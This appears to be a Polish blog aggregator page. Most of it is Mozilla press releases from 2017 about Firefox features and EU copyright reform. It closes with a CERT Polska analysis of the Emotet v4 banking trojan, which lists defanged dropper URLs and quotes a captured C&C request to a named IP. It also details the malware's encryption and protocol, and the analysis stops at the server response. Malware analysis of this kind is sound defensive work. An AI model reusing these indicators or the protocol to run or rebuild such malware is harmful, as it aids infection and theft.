W tym roku wprowadziliśmy do Firefoksa kilka ulepszeń, na przykład, działanie w oparciu o wiele procesów, znajdując właściwy balans między szybkością a zużyciem pamięci. Dodatkowo wprowadziliśmy funkcje takie jak WebAssembly i WebVR, umożliwiając szybsze działanie aplikacji webowych na komputerach stacjonarnych i zestawach VR.

Wiele zmian zostało już wprowadzonych, ale dla Firefox Quantum zaplanowaliśmy jeszcze więcej.

Szybsze działanie na najważniejszych stronach

Firefox Quantum jest dużym krokiem naprzód – odczujesz to przeglądając ulubione strony.

Szybkość działania Firefox Quantum może być zmierzona – nasz zespół lubi podejście oparte na danych. Jednym ze sposobów jest użycie Speedometer 2.0 (prace nad tym narzędziem jeszcze trwają), który symuluje współczesne aplikacje mobilne. Wyniki zależą od komputera i aplikacji, których używasz, ale jedną stałą rzeczą jest fakt, że Firefox Quantum jest około 2 razy szybszy niż Firefox rok temu.

Zachęcamy Was do samodzielnego przeprowadzenia porównania lub obejrzenia krótkiego wideo, w którym porównujemy Firefox Quantum i Chrome na różnych stronach. Firefox Quantum jest często znacznie szybszy.

Jak sprawiliśmy, że Firefox Quantum działa tak szybko?

Firefox do tej pory działał tylko na jednym procesorze, ale dzisiejsze wieloprocesorowe wydanie w wersji desktopowej i mobilnej działa bardziej efektywnie. Przykład? Opracowaliśmy przełomowe podejście do układania stron: szybki silnik CSS napisany w Rust, języku programowania systemów, który wprowadziła Mozilla. Nowy silnik CSS w Firefoksie działa szybko i równolegle na wielu rdzeniach procesora, zamiast uruchamiania jednej wolniejszej sekwencji na jednym rdzeniu. Żadna inna przeglądarka tak nie działa.

Od teraz karta, której używasz w danym momencie otwiera się przed innymi kartami, działającymi w tle. Dzięki temu Firefox Quantum często wypada lepiej w testach niż Chrome, zużywając tylko 30% RAM-u.

Dodatkowo, w ciągu kilku ostatnich miesięcy przeprowadziliśmy kilka testów, aby wyłapać wszelkie błędy w działaniu. Do tej pory udało nam się rozwiązać 468 małych i dużych błędów.

Przedstawiamy szybki i płynny Photon

Nie liczą się tylko testy prędkości, ważne jest również, aby nasi użytkownicy czuli, że korzystają z dobrze przemyślanego produktu. Aby pokazać wszystkie na pozór niewidoczne ulepszenia, zmieniliśmy wygląd Firefoksa opierając się na naszym projekcie – Photon. Nasz utalentowany zespół projektantów poświęcił wiele czasu na zrozumienie jak użytkownicy postrzegają przeglądarki.

Nowy interfejs Firefoksa odzwierciedla potrzeby użytkowników, którzy są bardziej zadaniowi, niż kiedyś. Jesteśmy pewni, że dzięki Photon, Firefox Quantum zaimponuje im nowoczesnym designem. Photon nie tylko dobrze wygląda, jest też inteligentniejszy – używając go na komputerze Windows z dotykowym ekranem, rozmiar menu zmienia się w zależności od tego, czy klikasz myszką czy palcem.

Nowy, minimalistyczny design składa się z kwadratowych kart, płynnie działających animacji i Biblioteki, która zapewnia szybki dostęp do zakładek, aplikacji Pocket, historii, pobranych dokumentów i screenshotów. Firefox Quantum działa z systemami operowanymi dotykowo – Windows 10, macOS High Sierra, Android Oreo i iOS 11.

Wbudowany Pocket

Firefox Quantum to lepsza integracja Firefoksa z aplikacją Pocket, którą Mozilla przejęła w zeszłym roku. Otwierając nową kartę zobaczysz treści polecane przez Pocket obok twoich ulubionych stron. Jednym kliknięciem zachowasz w aplikacji interesujące treści. Aplikacja Pocket na iOS lub Androida umożliwi dostęp offline do zachowanych treści w każdej chwili.

Uaktualnij swoją przeglądarkę do Firefox Quantum wkrótce lub pobierz wersję Beta dzisiaj

Jeśli należysz do naszych wiernych użytkowników, Twoja przeglądarka zaktualizuje się automatycznie 14 listopada. Możesz też już dziś wypróbować wersję Beta na komputerze stacjonarnym, urządzeniach z Androidem lub iOS. Deweloperzy mogą pobrać deweloperską edycję, w której dostępne są nowe narzędzia.

Firefox zmieniał się na przestrzeni ostatnich lat, a dużo nowości jeszcze przed nami. Aby być na bieżąco z informacjami o Firefox Quantum odwiedźcie naszą stronę.

Cieszymy się, że nasi użytkownicy beta będą mogli korzystać z Firefox Quantum i mamy nadzieję, że i Wy spróbujecie.

kornelia.gruszka, 26 września 2017, 14:51

21 września 2017

Centrum prasowe Mozilli

Ochrona przed śledzeniem w Firefoksie na iOS oraz Multi-Tasking w Firefox Focus na Androida

Nick Nguyen,  21 września 2017

Wrzesień obfituje w nowości w branży mobilnej.

Dziś oddajemy w wasze ręce najnowszą wersję Firefoksa na iOS oraz Firefox Focus na Androida, który swoją premierę miał w czerwcu.

Co nowego w Firefoksie na iOS:

Ochrona przed śledzeniem: po raz pierwszy użytkownicy iOS11 na iPhonie oraz iPadzie mogą korzystać z opcji automatycznego blokowania reklam w trybie prywatnego przeglądania oraz z ochrony przed śledzeniem w trakcie regularnego przeglądania. Funkcja ta używa tej samej technologii, która została wykorzystana w Firefox Focus na Androida i iOS, Firefoksie w wersji desktopowej i Firefoksie na Androida. Zawsze staramy się udostępniać naszym użytkownikom najnowsze funkcje i nareszcie możemy podzielić się nimi w Firefoksie na iOS, a to wszystko dzięki zmianom jakie wprowadził Apple dla wszystkich przeglądarek.

Ulepszona Synchronizacja: nasi użytkownicy do tej pory mieli możliwość zsynchronizowania danych takich jak hasła, historia czy zakładki do wersji mobilnej. Od teraz działa to też w drugą stronę, umożliwiając synchronizację danych z telefonu z wersją desktopową.

Pobierz najnowszą wersję Firefoksa na iOS.

Nowości w Firefox Focus na Androida:

Nowa funkcja kart: mimo, że główną cechą Firefox Focus jest prostota, posłuchaliśmy waszego zdania i polepszyliśmy jakość prywatnego przeglądania. Od teraz użytkownicy mogą korzystać z kilku zakładek w tym samym czasie, swobodnie poruszając się między przeglądanymi stronami.

Pobierz Firefox Focus na Androida ze sklepu Google Play.

Wypróbujcie i dajcie znać, co sądzicie.

kornelia.gruszka, 21 września 2017, 13:41

11 września 2017

Centrum prasowe Mozilli

Głosowanie nad prawem autorskim, które może zmienić europejski Internet

10 października prawodawcy Unii Europejskiej zagłosują nad niebezpiecznym wnioskiem o zmianę prawa autorskiego. Mozilla nakłania obywateli UE, aby żądali lepszych reform.

Mozilla

10 października Komisja Prawna (JURI) Parlamentu Europejskiego zagłosuje nad wnioskiem o zmianę unijnego prawa autorskiego.

Wynik tego głosowania może zagrozić wolności i otwartości w Internecie. Może dalece upowszechnić filtrowanie i blokowanie treści, wpływając na życie setek milionów obywateli UE, którzy codziennie korzystają z Internetu.

Dlaczego reforma prawa autorskiego jest tak ważna?

Obecne unijne prawo autorskie jest przestarzałe. Zostało ono napisane w czasach, gdy nie komórka, a pocztówka była najpowszechniejszą metodą komunikacji.

Unijny wniosek o reformę tego prawa jest pod wieloma względami krokiem w tył. „Dyrektywa w sprawie praw autorskich na jednolitym rynku cyfrowym” zostanie poddana głosowaniu wstępnemu 10 października, a w grudniu będzie miało miejsce głosowanie ostateczne.

— Wiele aspektów wniosku i część poprawek złożonych w Parlamencie jest dysfunkcyjnych i na granicy absurdu — powiedziała Raegan MacDonald, Senior EU Policy Manager Mozilli. — Wniosek sprawiłby, że filtrowanie i blokowanie treści w Internecie stałoby się normą, skutkując osłabieniem innowacji, konkurencji i wolności wypowiedzi.

Jeśli wniosek stanie się prawem:

Rola Mozilli

W ciągu tygodni przed głosowaniem Mozilla nakłania obywateli UE, aby zadzwonili do swoich prawodawców i zażądali lepszej reformy. Nasza witryna i narzędzie do połączeń telefonicznych — changecopyright.org — ułatwia kontakt z europosłankami i europosłami.

To nie pierwszy raz, gdy Mozilla upomina się o zdroworozsądkową reformę prawa autorskiego dla ery internetowej. Na początku roku w ramach protestu Mozilla i ponad sto tysięcy obywateli UE zrzuciło dziesiątki milionów wirtualnych ulotek na znane europejskie budynki. W 2016 r. zebraliśmy ponad sto tysięcy podpisów nawołujących do reformy.

Wyważona, elastyczna i przyjazna kreatywności reforma prawa autorskiego jest niezbędna dla zdrowego Internetu. Jeśli się zgadzasz, wejdź na changecopyright.org i wyraź swoje zdanie.

kornelia.gruszka, 11 września 2017, 07:36

8 sierpnia 2017

Centrum prasowe Mozilli

Firefox jeszcze lepszy. WebVR i nowe funkcje przyspieszające działanie od dziś dostępne w Firefoksie

Nick Nguyen, 8 sierpnia 2017

Pewnie zauważyliście już, że ciężko pracujemy nad tym, żeby Firefox był szybszy i lepszy niż kiedykolwiek. Dziś przekazujemy Wam nasze najlepsze jak do tej pory wydanie, w którym dostępne są technologie dla twórców oraz udogodnienia poprawiające jakość korzystania z przeglądarki dla wszystkich użytkowników.

Zobaczmy, co nowego znajdziecie w dzisiejszym wydaniu:

WebVR otwiera zupełnie możliwości dla WWW

Poza nową, super szybką i wieloprocesową bazą, wprowadzamy przełomową funkcję, dzięki której korzystanie z sieci wkracza na zupełnie nowy poziom. Firefox na Windowsa jest pierwszą desktopową przeglądarką, która wspiera WebVR dla wszystkich użytkowników, umożliwiając doświadczenie rozrywki kolejnej generacji w wirtualnej rzeczywistości.

WebVR pozwala deweloperom i artystom tworzyć w VR, a użytkownicy mogą przeglądać te treści za pomocą Firefoksa. Niezależnie od tego, czy masz już Oculus Rift lub HTC Vive – lub ciągle jesteś niezdecydowany – Firefox przybliża Cię do korzystania z rozwiązań VR. Kiedy znajdziesz grę lub aplikację, która wspiera VR, wystarczy kliknąć na ikonkę gogli widoczną na stronie. Możesz nawigować i kontrolować wirtualną rzeczywistość przy pomocy kontrolerów i własnych ruchów.

Jeśli jesteś gotowy na wypróbowanie wirtualnej rzeczywistości w Firefoksie, rosnąca społeczność twórców zaczęła już dodawać treści dzięki WebVR. Odwiedź vr.mozilla.org aby zobaczyć treści zbudowane przy użyciu A-Frame, wygodnego frameworka do tworzenia w wirtualnej rzeczywistości. Nasz ulubiony to A Painter. Nie byłoby to możliwe bez wsparcia i ciężkiej pracy zespołu Mozilla VR, który ściśle współpracował z partnerami z branży, twórcami przeglądarek i deweloperami. Jeśli chciałbyś dowiedzieć się więcej, przeczytaj blog post Seana White’a na Medium.

Panel wydajności – dostosuj ustawienia

Dzięki wieloprocesowej architekturze, Firefox może z łatwością obsługiwać skomplikowane strony, szczególnie kiedy masz otwartych kilka takich stron jednocześnie. Opracowaliśmy optymalne rozwiązanie dla większości urządzeń, ale jeśli lubicie sami szperać w ustawieniach, możecie dopasować procesy do swoich upodobań. Ustawienia znajdziecie na dole sekcji Główne w Opcjach.

Wskazówka: jeśli Twój komputer ma dużo RAM-u (na przykład 8GB) możesz zwiększyć liczbę procesów z 4 fabrycznie ustawionych w Firefoksie. To sprawia, że Firefox działa jeszcze szybciej, mimo, że zużywa więcej pamięci. W naszych testach na Windowsa 10, Firefox zużywa mniej pamięci niż Chrome, nawet z 8 działającymi procesami.

Szybszy start przy dużej liczbie kart

Jesteś zbieraczem kart? Jako część naszego projektu Quantum Flow, który ma zwiększyć wydajność, znacząco zredukowaliśmy czas, jaki potrzebny jest do włączenia przeglądarki, kiedy macie zapisane karty z poprzedniej sesji. O ile szybciej jest teraz? Dietrich Ayala, członek naszej społeczności przeprowadził interesujący eksperyment, porównując, ile czasu zajmuje otwarcie różnych wersji Firefoksa, z otwartymi 1 691 kartami. Wynik? To, co wcześniej zajmowało prawie 8 minut, teraz zajmuje 15 sekund.

Szybszy i bardziej stabilny Firefox dla 64-bitowego Windowsa

Jeśli korzystasz z 64-bitowej wersji Windowsa (sprawdź tu), powinieneś dzisiaj ściągnąć i ponownie zainstalować Firefoksa, ponieważ nowe wydanie to 64-bitowa wersja przeglądarki, która jest mniej podatna na utratę pamięci i przerwę w działaniu. Z naszych testów wynika, że 64-bitowa wersja redukuje błędy o 39% na urządzeniach z 4GB RAM-u.

Jeśli nie przeprowadzasz aktualizacji ręcznie, nie martw się. Mamy w planach automatyczne przekierowanie użytkowników 64-bitowego Windowsa do 64-bitowego Firefoksa w kolejnym wydaniu.

Szybsze wyszukiwanie

Codziennie czegoś szukamy – wiedzy z Wikipedii, wymarzonego produktu na Amazonie albo wideo na YouTubie.

Nowe wydanie Firefoksa umożliwia szybkie przeszukiwanie wielu stron prosto z pola do wpisywania adresu strony. Wpisz swoje pytanie, a potem wybierz wyszukiwarkę, z której chcesz skorzystać.

 

Możesz wybierać między Yahoo, Google, Bing, Amazonem, DuckDuckGo, Twitterem i Wikipedią. Możesz też dostosować listę do własnych potrzeb w Ustawieniach.

Jeszcze więcej

Poniżej lista jeszcze kilku interesujących ulepszeń:

Jak zawsze, możesz przeczytać wszystko w informacjach o wydaniu, a deweloperzy mogą przeczytać więcej o nowych API na blogu Hacks.

Pracujemy nad kolejnymi usprawnieniami!

kornelia.gruszka, 8 sierpnia 2017, 13:13

26 lipca 2017

Centrum prasowe Mozilli

Plan wsparcia Flasha przez Firefoksa

Firma Adobe ogłosiła wczoraj, że do końca roku 2020, przestanie wspierać Flasha. Współpracując z Adobe i innymi producentami przeglądarek, Mozilla przygotowała plan wsparcia Flasha przez Firefoksa w tym okresie, który ułatwi użytkownikom odejście od tej technologii.

Więcej informacji: http://bit.ly/Flash_Firefox

 

kornelia.gruszka, 26 lipca 2017, 06:50

20 lipca 2017

Centrum prasowe Mozilli

Firefox Focus dla Androida ma już milion pobrań! Dzisiaj wprowadzamy trzy nowe funkcje zgłoszone przez użytkowników

Od uruchomienia Firefoksa Focus dla Androida minął niespełna miesiąc, a już ponad million użytkowników zdążyło pobrać naszą szybką i wygodną aplikację przeglądarki. Dziękujemy za ogromne wsparcie dla Firefox Focus dla Androida. To pokazuje, że użytkownicy chcą decydować o ustawieniach prywatności – zwłaszcza w kwestii danych osobowych i tego, w jaki sposób korzystają z Internetu.

Wprowadzenie w zeszłym roku Firefox Focus dla iOS oparte było na założeniu, że każdy ma prawo do ochrony prywatności. Tworząc Firefox Focus dla Androida, umożliwiliśmy to wszystkim użytkownikom mobilnym i daliśmy im kontrolę nad zarządzaniem tym, jak korzystają z Internetu na różnych platformach.

W ciągu tygodnia od uruchomienia Firefox Focus dla Androida, otrzymaliśmy ponad 8 000 komentarzy, a sama aplikacja została oceniona na 4.5 gwiazdek. Byliśmy zaskoczeni reakcją użytkowników!

Feedback od użytkowników Firefox Focus


„Niesamowita przeglądarka Firefox jest teraz jeszcze bardziej skupiona na prywatności i bezpieczeństwie.”

 „Wspaniała! Jest rzeczywiście bardzo lekka i szybka.”

 „Jest to bez wątpienia najlepsza przeglądarka, którą należy ustawić jako domyślną. Super szybka i super lekka.”

 „Doskonale sprawdza się w tym, do czego została stworzona, czyli do szybkiego, bezpiecznego, prywatnego i wygodnego przeglądania Internetu.”

 

Nowe funkcje

Z każdym nowym wydaniem staramy się wprowadzać usprawnienia, a wasze komentarze pomagają nam w ulepszaniu naszych produktów. Wspólnie zastanowiliśmy się, co możemy szybko dodać i już dziś możemy Was poinformować o nowych funkcjach:

Naszą misją jest tworzenie produktów, które spełniają potrzeby użytkowników. Odpowiadając na Wasze szybkie i trafne komentarze, chcemy Wam podziękować i pokazać, że są dla nas ważne.

Nowa wersja przeglądarki Firefox Focus jest już dostępna w Google Play i App Store.

Powiadomienia:

kornelia.gruszka, 20 lipca 2017, 14:05

Firefox dla iOS przedstawia nowe i ulepszone funkcje: Karty, Tryb nocny oraz Czytnik QR kodów

W zespole Firefoksa zawsze staramy się zapewniać użytkownikom najlepsze doświadczenia podczas korzystania z sieci. Dzisiaj wprowadzamy ulepszenia stanowiące bazę dla tego, co czeka nas w ramach Project Quantum tej jesieni. Nowe funkcje mają uatrakcyjnić przeglądarkę mobilną i usprawnić korzystanie z Firefoksa dla iOS.

Nowe funkcje Firefox dla iOS:

Nowe karty

Ulepszyliśmy przeglądanie kart, dzięki czemu użytkownicy zobaczą ostatnio odwiedzane strony oraz te najczęściej odwiedzane.

Tryb nocny

Często, gdy znajdujemy się w ciemnym pomieszczeniu chcemy włączyć telefon komórkowy, żeby sprawdzić godzinę. Dodaliśmy więc Tryb nocny, który przyciemnia ekran telefonu i nie nadwyręża oczu. Od teraz czytanie w ciemności będzie łatwiejsze, a ryzyko, że ktoś przyłapie nas na sprawdzaniu poczty znacznie mniejsze.

Czytnik kodów QR

Chcesz ograniczyć liczbę aplikacji zainstalowanych na telefonie? Wyeliminowaliśmy konieczność pobierania osobnej aplikacji do kodów QR, wprowadzając wbudowany czytnik umożliwiający szybki dostęp do kodów QR.

Rekomendacje funkcji

Wszyscy uwielbiamy skróty, a nasze Rekomendacje funkcji zaoszczędzą Twój czas oferując podpowiedzi. Na początek ta funkcja będzie dostępna tylko w Stanach Zjednoczonych i w Niemczech.

Aby sprawdzić najnowsze funkcje i skorzystać z najnowszej wersji przeglądarki Firefox dla iOS należy pobrać aktualizację.

Mamy nadzieję, że się Wam spodoba!

kornelia.gruszka, 20 lipca 2017, 14:03

20 czerwca 2017

Centrum prasowe Mozilli

Firefox Focus teraz na Androida, blokuje reklamy i chroni Twoją prywatność

W zeszłym roku wprowadziliśmy Firefox Focus, nową przeglądarkę dla iPhone’a i iPada, zaprojektowaną tak, aby była szybka, prosta i zawsze chroniła Twoją prywatność. Od listopada wiele się wydarzyło, a my coraz częściej widzimy, że użytkownicy aktywnie chronią swoją prywatność i zużycie danych.

Focus to przeglądarka dla tych, którzy chcą zachować przeglądanie Internetu dla siebie. Reakcje użytkowników pozytywnie nas zaskoczyły – to najlepiej oceniania przeglądarka dla iPhone’a i iPada, z oceną 4.6 w App Storze.

Dziś mamy przyjemność ogłosić, że Firefox Focus jest też dostępny na Androida.

Podobnie jak w wersji na iPhone’a i iPada, aplikacja na Androida jest wolna od kart i innych elementów zakłócających przeglądanie, a usunięcie sesji ogranicza się do jednego kliknięcia. Firefox Focus pozwala Ci na surfowanie po sieci bez śledzących Cię reklam, które znane są ze spowalniania działania przeglądarki. Dlaczego blokujemy te trakery? Ponieważ śledzą Twoje zachowania bez Twojej wiedzy oraz sprawiają, że internet działa wolniej na Twoim telefonie.

 

 

 

 

 

 

 

 

 

 

 

 

Do Firefox Focus na Androida dodaliśmy następujące funkcje:

Dzięki swoim funkcjom takim jak wsparcie dla spersonalizowanych kart i wyłączenie blokowania reklam, Focus będzie też doskonale współpracował z aplikacjami takimi jak Facebook, kiedy będziecie chcieli przeczytać artykuł bez śledzenia. Będziemy kontynuować nasze prace nad przeglądarką, aby stale ją ulepszać.

Firefox Focus możesz pobrać tutaj.

kornelia.gruszka, 20 czerwca 2017, 11:15

14 czerwca 2017

Centrum prasowe Mozilli

Najlepszy Firefox

Nasza najnowsza wersja Firefoksa z E10S to idealna harmonia między pamięcią a szybkością

Nick Nguyen, 13 czerwca 2017

Nasz zespół Firefoksa często słyszy od użytkowników, że polegają na sieci podczas skomplikowanych zadań, jak planowanie podróży czy porównywanie cen. A zadania te wymagają otwarcia kilku kart. Na stronach pootwieranych w kartach często dużo się dzieje – animacje, wideo, duże zdjęcia. Rozbudowane strony są teraz coraz bardziej popularne – średnio zajmują 2,5 MB – tyle samo co oryginalna wersja gry Doom, według Wired. Do teraz rozbudowane strony otwarte w kartach w Firefoksie mogły spowolnić działanie innych kart, co oznaczało gorszy komfort pracy.

Aby Firefox działał jeszcze szybciej na rozbudowanych stronach, zmieniliśmy go tak, żeby funkcjonował w oparciu o wieloprocesowy system operacyjny. Prościej? Stary Firefox działał na podstawie pojedynczego procesu we wszystkich otwartych kartach. Współczesne przeglądarki rozkładają taki nakład na kilka procesów. Nasz proces nazwaliśmy „Electrolysis (E10S)”, na cześć procesu chemicznego, który rozkłada wodę na mniejsze elementy. E10S to największa do tej pory zmiana w kodzie Firefoksa, a dziś udostępniamy kolejny jej element.

Szybszy Firefox z 4 procesami

W dzisiejszym wydaniu Firefox używa 4 procesów do obsługi stron we wszystkich otwartych kartach. To oznacza, że rozbudowana strona otwarta w jednej z kart nie ma wpływu na działanie innych. Rozdzielając te procesy usprawniamy działanie Twojego komputera, a Firefox pozwala Ci swobodnie przeglądać sieć.

Korzystałem z tej opcji w nieoficjalnej wersji Firefoksa (Nightly). Poprawa wydajności jest bardzo widoczna. Poza szybszym działaniem i rzadszym wyłączaniem, E10S sprawia, że strony, nawet takie jak newsfeed na Facebooku, wydają się bardziej przejrzyste w odbiorze. Nie wyobrażam sobie już z korzystania z innego Firefoksa, jak tylko z tego z E10S.

Firefox 54 z E10S sprawia, że strony działają lepiej na wszystkich komputerach, szczególnie tych z mniejszą pamięcią. Celem Firefoksa jest osiągnięcie idealnej równowagi między szybkością działania a zużyciem pamięci. Aby dowiedzieć się więcej o wieloprocesowej architekturze Firefoksa i czy różni się od Chrome’a przeczytaj wpis Rayana Pollocka.

Wieloprocesowość bez obciążania pamięci – Firefox wygrywa porównanie zużycia pamięci

W naszych testach porównaliśmy zużycie pamięci dla różnych przeglądarek i zobaczyliśmy, że Firefox zużywa znacznie mniej RAM-u niż inne przeglądarki na Windows 10, macOS i Linuksie. (RAM oznacza pamięć o dostępie swobodnym, taką, w której zapisane są aplikacje, z których korzystasz). To oznacza, że z Firefoksem możesz do woli przeglądać strony i mieć wystarczająco dużo pamięci, aby uruchomić inne aplikacje, których chcesz używać.

Najlepszy Firefox

To najlepsze jak do tej pory wydanie Firefoksa, z usprawnieniami, które każdy zauważy. W tym wydaniu wprowadzamy też kilka innych ulepszeń, o których możecie przeczytać tutaj. Jeśli jesteś deweloperem webowym lub zbudowałeś rozszerzenie do przeglądarki, sprawdź bloga Hacks i przeczytaj o uaktualnieniach.

Robimy postępy w pracach nad Project Quantum oraz przeglądarką dostosowaną do współczesnych komputerów. Naszym celem jest, aby Firefox stał się najszybszą przeglądarką w wersji desktopowej i mobilnej. Pod koniec 2017 roku zobaczycie jeszcze kilka zmian od zespołu Firefoksa. Jeśli przestałeś go używać, daj mu drugą szansę – będziesz pod wrażeniem. Czekamy na Wasze opinie.

kornelia.gruszka, 14 czerwca 2017, 13:22

24 maja 2017

CERT Polska

Analiza złośliwego oprogramowania Emotet v4

Wstęp

Emotet jest modularnym koniem trojańskim, który po raz pierwszy został zaobserwowany w czerwcu 2014 roku przez Trend Micro. Ten rodzaj złośliwego oprogramowania jest ściśle powiązany z innymi rodzajami, takimi jak Geodo, Bugat czy Dridex, które uznawane są za warianty należące do jednej rodziny.

Zadebiutował jako zaawansowany banker – u swych początków wykorzystywany był do wykradania pieniędzy z kont zainfekowanych ofiar. Jego początkowa wersja była wymierzona w klientów niemieckich i austriackich banków. Przejmowanie kont odbywało się z użyciem techniki Man-in-the-Browser, polegającej na przejęciu kontroli nad przeglądarką i przechwytywaniu komunikacji sieciowej przez podsłuchiwanie wywołań odpowiednich funkcji systemowych.

W kolejnej wersji (v2) arsenał Emoteta został uzupełniony o automatyczne wyprowadzanie pieniędzy z kont przy pomocy systemów ATS (Automatic Transfer System) (dokładniejszy opis tej techniki można znaleźć na 20 stronie raportu CERT Polska z 2013 r.). Jest to sposób powszechnie wykorzystywany również w innych bankerach, m.in. w ISFB (Gozi) i Tinbie.

Na początku kwietnia 2017r. zaobserwowaliśmy szeroką kampanię spamową, w której były dystrybuowane fałszywe maile pochodzące rzekomo od firmy kurierskiej DHL. Maile zawierały odnośnik prowadzący do nieznanego wcześniej, nowego wariantu złośliwego oprogramowania znanego pod nazwą Emotet.

W przypadku tej kampanii, zmiany w kodzie oprogramowania, a także w sposobie komunikacji z serwerami Command&Control wskazywały, iż mamy do czynienia z Emotetem w wersji 4. Z tego względu postanowiliśmy szczegółowo przeanalizować to zagrożenie.

Dropper

Skrypt do którego prowadziły odnośniki zawarte w mailach nie był mocno zobfuskowany. Łańcuchy znaków zostały jedynie odwrócone, stąd można było bez większego trudu odczytać adresy URL, prowadzące do pliku zawierającego omawiany malware.

Adresy URL prowadzące do Emoteta:

hxxp://etherealmedia.co.uk/download6051/
hxxp://intecsoftware.com/download1577/
hxxp://danirvinphotography.com/download0303/
hxxp://brandcastersmedia.com/download6493/
hxxp://aktech.com.pl/download9674/

Moduł główny

Emotet jest złośliwym oprogramowaniem o strukturze modułowej. Podstawowym zadaniem pobieranego przez dropper pliku wykonywalnego jest rejestracja bota i pobranie modułów pełniących konkretne zadania. Złośliwe oprogramowanie dostarczane jest w postaci spakowanej przy pomocy generycznego packera, który w zamierzeniu ma zmylić silniki antywirusowe i utrudnić analizę. Po rozpakowaniu, sterowanie przekazywane jest do głównego kodu.

Na samym początku ładowane są biblioteki i rozwiązywane są adresy funkcji WinAPI, wykorzystywane przez malware m.in. do szyfrowania i komunikacji z serwerem Command&Control. Nazwy potrzebnych funkcji i bibliotek przechowywane są w postaci tablic wartości funkcji skrótu z nazwy danego elementu. Emotet wykorzystuje w tym celu prostą funkcję haszującą sdbm. Aby dodatkowo zróżnicować tablice, zawarte w nich wartości XORowane są dodatkowo ze stałą wartością określoną w pliku.

Charakterystyczne łańcuchy znaków również nie występują jawnie – są dekodowane na czas użycia przy pomocy 4-bajtowego klucza XOR skojarzonego z danym łańcuchem.

Główny plik wykonywalny zawiera również listę adresów IP i portów, kierujących do serwerów C&C. Podobnie jak w poprzednich wersjach – komunikacja z serwerem kontrolera przebiega z użyciem protokołu HTTP.

Szyfrowanie komunikacji

Największe zmiany względem poprzedniej wersji Emoteta można zaobserwować w komunikacji. Wcześniej do szyfrowania wykorzystywany był algorytm RC4. W wersji czwartej wykorzystywany jest 128-bitowy AES.

Przykładowe żądanie wygląda następująco:

GET / HTTP/1.1
Cookie: DD29=e8fd7YpIy2Ui+U7bz1/cQD9bH4KHshzaN2SpKoPEnC1D85K4Zrwdb6dBoHoDC5GgvcgecLN20kpk1lQxus6AJEiutWK4hBSWFbQUmtyr3LxI+/3MFdKn1lo7nWyEw+sCzKL6y34njzJwoDwd3I5BJD0NqUL+iEnbB1EWXQhxcXihFeFS+TlRsuMxOl3Xmyo2p0FuHX+hyGoO19dzLpEMK1LhXGkCkha+kPGFqfxECUoQndFLiMRgXAj4Omw/Ywc6Ba+9d5fyZNLEKbtkxsfO3KmQSLoE4TkITRri1kSMCqnNlb7PTroCQmoJvRHBiEGla6VzgmCQ5tsspBIuaWc2ct9hX9c4SLZbTnW6mPjLIh4VeDJ7gNpwhedyLHcnr3GWjILLwFPk7RmgHglXXI2qEOXcwbRhtaNuI8RrkMQj37Rov147wEGBtt+GlQR9/9oFXoBXH9f6m5K4ULP3CEnDGGJVEtfkgt7yZ082wAIfVzow1szvMF4bF7MFaCPbHA9hygyf9Uc8GwDjM4CndFxUwROWmEgQKjIk24PIj5Y+oz4jF
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 206.214.220.79:8080
Connection: Keep-Alive
Cache-Control: no-cache

Treść żądania zawarta jest w nagłówku Cookie. Nazwa „ciasteczka” generowana jest losowo i stanowi 16-bitową wartość zakodowaną szesnastkowo. Wartość ciasteczka zawiera żądanie zakodowane w Base64.

Wartość po odkodowaniu ma następującą strukturę:

Offset Nazwa pola
0..95 Zaszyfrowany asymetrycznie 128-bitowy klucz AES wykorzystany do zaszyfrowania żądania
96..115 Wartość SHA1 z treści żądania w postaci jawnej
116..x Żądanie zaszyfrowane kluczem AES-128 w trybie CBC

Przed wysłaniem żądania tworzone są dwa klucze. Najpierw ładowany jest 768-bitowy klucz publiczny RSA, zawarty w pliku wykonywalnym. Następnie generowany jest losowy klucz AES-128-CBC, który posłuży do szyfrowania komunikacji z C&C. Wygenerowany klucz AES szyfrowany jest kluczem RSA-768 i dołączany jest do żądania z użyciem PKCS#1v2.0 (OAEP).

Kryptografia zrealizowana jest przy pomocy zestawu funkcji Microsoft CryptoAPI.

Generowanie i importowanie kluczy:

Szyfrowanie żądania:

Komunikacja z C&C

Po przechwyceniu i odszyfrowaniu komunikatu z żądaniem – żądanie prezentowało się następująco:

W komunikacji wykorzystywany jest protokół bazujący na Google Protocol Buffers. Protocol Buffers stanowi rozwiązanie, które pozwala na proste budowanie protokołów, przy użyciu struktur definiowanych w języku protobuf. Na podstawie tak określonych struktur, Protocol Buffers generuje moduły, dostarczające parsery i serializery dla poszczególnych elementów protokołu, które mogą być bezpośrednio wykorzystane w aplikacji. Protocol Buffers pozwala na generowanie modułów dla wielu języków programowania. Wśród wspieranych języków jest m.in. Python, Java, PHP czy C++. Zastosowanie tego typu rozwiązań nie jest nowością w przypadku złośliwego oprogramowania i było wykorzystywane wcześniej, np. w Gootkicie.

W przypadku Emoteta, autor pokusił się o małą modyfikację. Jeden z elementów wykorzystuje niestandardowe kodowanie, przez co nie jest poprawnie odczytywany przez standardowe parsery (przykładowo protoc –decode_raw zwraca błąd).

Mimo to udało nam się odtworzyć strukturę protokołu:

W żądaniu rejestracji wysyłany jest numer komendy (16) i podstawowe dane o systemie operacyjnym, na którym bot zostaje uruchomiony. Poszczególne pola struktury RegistrationRequestBody zawierają następujące informacje:

Pole botId

Pole botId zawiera identyfikator bota unikalny dla danej maszyny. Jego wartość ma następującą strukturę:

[host_name]_[locale]_[host_id]
np. CERTCERT_PL_32122958

Pole osVersion

32-bitowe pole określające wersję systemu operacyjnego Windows. Poszczególne bity zawierają informację o następujących elementach struktury OSVERSIONINFOEX

Bity Opis pola
0..3 dwMajorVersion
4..7 dwMinorVersion
8..11 wServicePackMajor
12..15 wServicePackMinor
16..19 wProductType
20..23 SYSTEM_INFO.wProcessorArchitecture

Pole procList

Zawiera listę nazw uruchomionych procesów, oddzielonych przecinkiem.

Pole mailClient

Informacje o wykorzystywanym kliencie poczty (wartość pozyskiwana z klucza rejestru HKLM\Software\Clients\Mail). Jeśli jest to Microsoft Outlook i jego plik DLL MAPI (Messaging Application Program Interface) jest 64-bitowy, do nazwy dodawany jest przyrostek „x64” po spacji.

Odpowiedź

W odpowiedzi C&C dostarcza listę modułów złośliwego oprogramowania. Bez względu na to czy zostało wysłane poprawne żądanie, czy nie – odpowiedź zawsze zawiera status 404 Not Found. Mimo to, przy poprawnym skomunikowaniu się z serwerem, w treści otrzymujemy zaszyfrowaną odpowiedź.

HTTP/1.1 404 Not Found
Server: nginx
